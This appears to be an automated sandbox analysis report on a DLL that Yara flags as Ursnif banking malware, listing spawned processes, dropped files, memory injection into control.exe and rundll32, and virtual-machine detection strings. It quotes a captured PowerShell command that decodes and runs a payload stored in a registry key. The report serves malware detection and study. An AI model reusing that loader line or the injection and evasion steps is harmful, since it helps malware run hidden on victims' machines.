Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 2200.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 2200.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000013.00000002.825653473.000001EE85550000.00000002.00000001.sdmp, csc.exe, 00000015.00000002.832839285.00000223F7150000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb source: 2200.dll
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.849689543.0000000005790000.00000004.00000001.sdmp
Source:	Binary string: c:\housebar\Crosstown\WifeTalk\windowact\raceBank\Hunt.pdb@ source: 2200.dll
Source:	Binary string: rundll32.pdb source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000018.00000002.880690061.000002A3D8A5C000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000017.00000000.850334764.0000000005A00000.00000002.00000001.sdmp

Source: 2200.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 2200.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 2200.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 2200.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 2200.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B15BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00B15BD5

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2200.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001FAC00 push ecx; ret	1_2_001FAC09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001FAF33 push ecx; ret	1_2_001FAF43
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B37177 push ecx; ret	1_2_00B37187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B36E10 push ecx; ret	1_2_00B36E19
Source: C:\Windows\System32\control.exe	Code function: 24_2_0098C131 push 3B000001h; retf	24_2_0098C136
Source: C:\Windows\System32\rundll32.exe	Code function: 26_2_0000016D9D00C131 push 3B000001h; retf	26_2_0000016D9D00C136

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3761

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 240	Thread sleep count: 53 > 30			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096	Thread sleep time: -7378697629483816s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_001F7DD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_00B1E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_00B2888D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_00B34FE1

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_00B205EF

Source: explorer.exe, 00000017.00000000.855300373.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000019.00000000.861049272.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000017.00000000.855300373.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 00000018.00000002.864575917.000002A3D6BC5000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\a-
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000017.00000000.847166251.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RuntimeBroker.exe, 00000019.00000000.862963971.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B15BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00B15BD5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00B316A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_00B316A5

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\System32\control.exe base: A20000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 16D9CD20000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
